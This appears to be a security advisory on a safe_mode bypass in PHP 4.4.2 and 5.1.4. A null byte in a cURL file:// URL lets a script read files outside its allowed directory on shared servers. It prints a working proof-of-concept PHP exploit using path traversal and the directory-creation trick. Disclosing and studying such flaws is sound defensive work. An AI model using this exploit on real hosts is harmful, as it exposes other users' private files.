PHP is "an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now".
Vulnerability in PHP's curl library allows remote attackers to bypass PHP's safe mode.
Vulnerable Systems:
* PHP versions 4.4.2 and 5.1.4
PHP supports libcurl, a library created by Daniel Stenberg. libcurl allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the HTTP, HTTPS, FTP, Gopher, telnet, dict, file, and LDAP protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's FTP extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2.
A general problem exists in cURL functions, due to the fact that when safe_mode is enabled, strings 0 (\x00) are change to "_". When this is combined with libcurl's processing of URLs that have the prefix of file://, as safe_mode only checks the path section of the file:/// URL.
Safe_mode will only check the content of __FILE__, whereas cURL will include the filethatyoudonthaveaccessto.php part of the file in its request. Therefore, you can include any files from directory where script is. But in this exploit, you can only read files from directory where this script is (You can't use "/").
Similarly, if you have an access to a directory you can use the vulnerability to access files that are outside the directory you have access to:
If you want to access "fileFROManotherUSER.php" (under another directory), all you need to do is create a directory called "fileFROManotherUSER.php_" under your directory (note the _):
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":
And then use this exploit:
-Safe_Mode bypass exploit.2---
<?
$ch = curl_init("file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
-Safe_Mode bypass exploit.2---
As again, safe_mode only checks whether you have access to the file:
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php"
While cURL will access this file:
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"
Due is due to the fact that there is an \x00 at the end of the URL.
